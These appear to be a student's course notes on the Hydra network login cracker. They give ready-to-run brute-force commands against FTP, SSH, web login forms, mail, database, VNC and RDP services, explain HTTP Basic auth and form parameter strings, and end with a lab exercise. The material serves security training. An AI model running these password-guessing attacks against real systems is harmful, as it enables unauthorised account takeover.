5 - Hydra - JA Smith

# Introduction - `hydra` is a fast network login cracker that supports numerous attack protocols - Can be used against web apps, FTP, SSH, etc. - See help menu with `hyrda -h` ```bash hydra -l <username> -p <password> ftp://<ip_addr> hydra -L <user_list> -P <password_list> ssh://<ip_addr> ``` |Hydra Service|Service/Protocol|Description|Example Command| |---|---|---|---| |ftp|File Transfer Protocol (FTP)|Used to brute-force login credentials for FTP services, commonly used to transfer files over a network.|`hydra -l admin -P /path/to/password_list.txt ftp://192.168.1.100`| |ssh|Secure Shell (SSH)|Targets SSH services to brute-force credentials, commonly used for secure remote login to systems.|`hydra -l root -P /path/to/password_list.txt ssh://192.168.1.100`| |http-get/post|HTTP Web Services|Used to brute-force login credentials for HTTP web login forms using either GET or POST requests.|`hydra -l admin -P /path/to/password_list.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"`| |smtp|Simple Mail Transfer Protocol|Attacks email servers by brute-forcing login credentials for SMTP, commonly used to send emails.|`hydra -l admin -P /path/to/password_list.txt smtp://mail.server.com`| |pop3|Post Office Protocol (POP3)|Targets email retrieval services to brute-force credentials for POP3 login.|`hydra -l [email protected] -P /path/to/password_list.txt pop3://mail.server.com`| |imap|Internet Message Access Protocol|Used to brute-force credentials for IMAP services, which allow users to access their email remotely.|`hydra -l [email protected] -P /path/to/password_list.txt imap://mail.server.com`| |mysql|MySQL Database|Attempts to brute-force login credentials for MySQL databases.|`hydra -l root -P /path/to/password_list.txt mysql://192.168.1.100`| |mssql|Microsoft SQL Server|Targets Microsoft SQL servers to brute-force database login credentials.|`hydra -l sa -P /path/to/password_list.txt mssql://192.168.1.100`| |vnc|Virtual Network Computing (VNC)|Brute-forces VNC services, used for remote desktop access.|`hydra -P /path/to/password_list.txt vnc://192.168.1.100`| |rdp|Remote Desktop Protocol (RDP)|Targets Microsoft RDP services for remote login brute-forcing.|`hydra -l admin -P /path/to/password_list.txt rdp://192.168.1.100`| ## Brute-Forcing HTTP Authentication ```bash hydra -L usernames.txt -P password.txt example.com http-get ``` ## Targeting Multiple SSH Servers ```bash hydra -u <user> -p <password> -M targets.txt ssh ``` ## Testing FTP Creds Against a Non-Standard Port ```bash hydra -L usernames.txt -p <password> -s 2121 -V ftp.example.com ftp # -V flag for extra verbose ``` ## Brute-Forcing a Web Login Forms ```bash hyrda -l <user> -P passwords.txt example.com http-post-form ```shell-session "/login:user=^USER^&pass=^PASS^:S=302" # here we emply the http-post-form module with the specified form parameters, where a successful login results in a 302 status code ``` ## Advanced RDP Brute-Forcing ```bash hydra -l user -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 <ip_addr> rdp # here we generates test passwords ranging from 6 to 8 characters, using the specified character set ``` # Basic HTTP Authentication - Web apps often employ authentication to protect sensitive data and functionalities - Basic auth is a rudimentary challenge-response protocol - Below is an example GET request header using basic auth ```http GET /protected_resource HTTP/1.1 Host: www.example.com Authorization: Basic YWxpY2U6c2VjcmV0MTIz ``` - Use `hyrda` to brute-force HTTP basic auth with a known username ```bash hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 127.0.0.1 http-get / -s 81 # here the target service is an HTTP server and the attack should be performed using HTTP GET requests to the root path ('/') # we also override the default HTTP with port 81 ``` ![[images/Pasted image 20251117202206.png]] ![[images/Pasted image 20251117202314.png]]![[images/Pasted image 20251117202327.png]] # Security Forms - While login forms appear as simple boxes asking for username and password, they represent an interplay between client and server-side technologies - Example A login form structure ```html <form action="/login" method="post"> <label for="username">Username:</label> <input type="text" id="username" name="username"><br><br> <label for="password">Password:</label> <input type="password" id="password" name="password"><br><br> <input type="submit" value="Submit"> </form> ``` - Example B login form structure - ```html <form method="POST"> <h2>Login</h2> <label for="username">Username:</label> <input type="text" id="username" name="username"> <label for="password">Password:</label> <input type="password" id="password" name="password"> <input type="submit" value="Login"> </form> ``` - When submitted, the above form sends an HTTP POST request to the `/login` endpoint on the server - Below is an example HTTP POST requet header ```http POST /login HTTP/1.1 Host: www.example.com Content-Type: application/x-www-form-urlencoded Content-Length: 29 username=john&password=secret123 ``` - We can use the `http-post-form` module from `hydra` to brute-force the creds - Construction of the parameters string is crucial to success ```bash # example syntax for various parameter strings # Failure =Invalid credentials hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials" # Success =302 hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=302" # Success =Dashboard hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=Dashboard" ``` - Explanation for first example above - The form submits data to the root path (`/`) - The username field is named `username` - The password field is named `password` - An error message "Invalid credentials" is displayed upon failed login - After inspecting the form, open your browser's Developer Tools (F12) and navigate to the "Network" tab. Submit a sample login attempt with any credentials. This will allow you to see the POST request sent to the server. In the "Network" tab, find the request corresponding to the form submission and check the form data, headers, and the server’s response ![[images/Pasted image 20251117203038.png]] - Example full `hydra` command ```bash hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f IP -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials" ``` # Exercise - Visit site ![[images/Pasted image 20251117203150.png]] - Source Code [Ctrl+U]![[images/Pasted image 20251117203733.png]] - Dev tools [F12] ![[images/Pasted image 20251117203250.png]] - Run `hydra` command ![[images/Pasted image 20251117204015.png]] ![[images/Pasted image 20251117204052.png]]